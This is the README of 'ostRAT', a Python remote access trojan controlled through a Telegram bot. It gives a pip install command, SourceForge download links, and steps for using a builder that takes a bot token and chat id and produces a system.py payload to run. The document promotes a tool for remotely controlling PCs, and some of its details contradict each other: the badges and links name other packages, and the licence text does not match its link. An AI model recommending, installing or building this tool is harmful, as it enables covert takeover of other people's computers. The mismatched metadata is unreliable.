# ostRAT

![PyPI](https://img.shields.io/pypi/v/ostrat?color=orange) ![Python 3.9, 3.10](https://img.shields.io/pypi/pyversions/clubhouse?color=blueviolet)  ![License](https://img.shields.io/pypi/l/ostrat?color=blueviolet)

**Open Source Telegram RAT** - Remote PC access via Telegram Bot.

**SourceForge -** [ostRAT | SourceForge](https://sourceforge.net/projects/ostrat/files/)

## Installation

Install the current version with [PyPI](https://pypi.org/project/clubhouse-api/):

```bash

pip install ostrat

```

Or SourceForge: [ostRAT download | SourceForge](https://sourceforge.net/projects/ostrat/)
  
## Usage

After running ostRAT_builder.exe, you will see a window with a input field for token and id.  <br/>
After entering the id and token, [system.py](http://system.py/) will appear in the place where the file is located.  <br/>
Run the [system.py](http://system.py/) file and use the ostRAT bot.

## Settings

You can get a token from @BotFather in Telegram.  
It looks like "1111100000:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaaa" 
 
You can get a id from @myidbot in Telegram.  
It looks like "123456789"

## Contributing

Bugs, reports and/or pull requests are welcome.

## License

OSI-Approved Open Source » GNU General Public License version 3.0 [GPLv3](https://opensource.org/licenses/Apache-2.0)

## Author
Alexey Avilov
Telegram: [@Iexek](https://t.me/Iexek)